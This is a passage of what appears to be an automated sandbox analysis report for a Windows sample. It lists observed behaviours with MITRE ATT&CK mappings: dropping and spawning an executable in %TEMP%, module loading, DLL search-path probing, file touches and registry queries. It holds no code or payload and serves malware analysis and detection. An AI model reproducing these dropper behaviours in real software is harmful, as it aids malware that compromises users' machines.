\"1100120048480f6a@ADVAPI32.dll\"\n \"120013008c480f6a@ADVAPI32.dll\"\n \"12001300e4480f6a@ADVAPI32.dll\"\n \"14001500386e0f6a@ADVAPI32.dll\"\n \"14001500506e0f6a@ADVAPI32.dll\"\n \"14001500686e0f6a@ADVAPI32.dll\"\n \"17001800806e0f6a@ADVAPI32.dll\"\n \"0d000e00986e0f6a@ADVAPI32.dll\"\n \"11001200a86e0f6a@ADVAPI32.dll\"\n \"11001200bc6e0f6a@ADVAPI32.dll\"\n \"0d000e0044660f6a@WININET.dll\"\n \"0d000e00b4660f6a@WININET.dll\"\n \"10001100ec660f6a@WININET.dll\"\n \"1000110090670f6a@WININET.dll\"\n \"10001100006f0f6a@WININET.dll\"\n \"10001100146f0f6a@WININET.dll\"\n \"14001500286f0f6a@WININET.dll\"\n \"14001500406f0f6a@WININET.dll\"\n \"12001300586f0f6a@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"CreateProcessW\" with parameter \":*C:\\a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe *\" - (UID: 00000000-00005880)\n \"085cda53603755dc.exe\" called \"CreateProcessW\" with parameter \"a ZZZZZZUSTZG\" - (UID: 00000000-00005760)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75020000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75020000\n \"085cda53603755dc.exe\" loaded module \"SECUR32.DLL\" at base 74e00000\n \"085cda53603755dc.exe\" loaded module \"RPCRT4.DLL\" at base 764f0000\n \"085cda53603755dc.exe\" loaded module \"SHELL32.DLL\" at base 76620000\n \"085cda53603755dc.exe\" loaded module \"PROFAPI.DLL\" at base 75190000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 70300000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75460000\n \"085cda53603755dc.exe\" loaded module \"WS2_32.DLL\" at base 76280000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70620000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"085cda53603755dc.exe\" loaded module \"KERNEL32\" at base 75f40000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b690000\n \"085cda53603755dc.exe\" loaded module \"KERNEL32.DLL\" at base 75f40000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 764F0000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 764F0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448\" has an executable section named \".text\"\n \"085cda53603755dc.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448\" has an writable section named \".data\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448\" has an writable section named \".bss\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448\" has an writable section named \".idata\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448\" has an writable section named \".CRT\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448\" has an writable section named \".tls\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448\" has an writable section named \".rsrc\"\n \"085cda53603755dc.exe\" has an writable section named \".data\"\n \"085cda53603755dc.exe\" has an writable section named \".bss\"\n \"085cda53603755dc.exe\" has an writable section named \".idata\"\n \"085cda53603755dc.exe\" has an writable section named \".CRT\"\n \"085cda53603755dc.exe\" has an writable section named \".tls\"\n \"085cda53603755dc.exe\" has an writable section named \".rsrc\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005860)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"085cda53603755dc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"085cda53603755dc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a09 ...\" (UID: 00000000-00005760)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZUSTZG\" (UID: 00000000-00005860)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a09 ...\" (UID: 00000000-00005760)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZUSTZG\" (UID: 00000000-00005860)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448\" was detected as \"MinGW\" and name: \"Compiler\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"\n \"085cda53603755dc.exe\" was detected as \"MinGW\" and name: \"Compiler\"\n \"085cda53603755dc.exe\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00005880]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\version.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FLTLIB.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Secur32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" reads file \"c:\\a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"085cda53603755dc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" trying to touch file \"C:\\version.DLL\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\Documents\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ui\\SwDRM.dll\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" trying to touch file \"C:\\Windows\\System32\\sechost.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" writes file \"%temp%\\085cda53603755dc.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00005880]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"A92C0F7C02884571E98EFBC6A28DC5E8EB168738F7C5FE1A8AF2FF0A0967F448\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"CATEGORY\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"NAME\"; Value: \"\")\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" (Access type: \"QUERYVAL\"; Path: 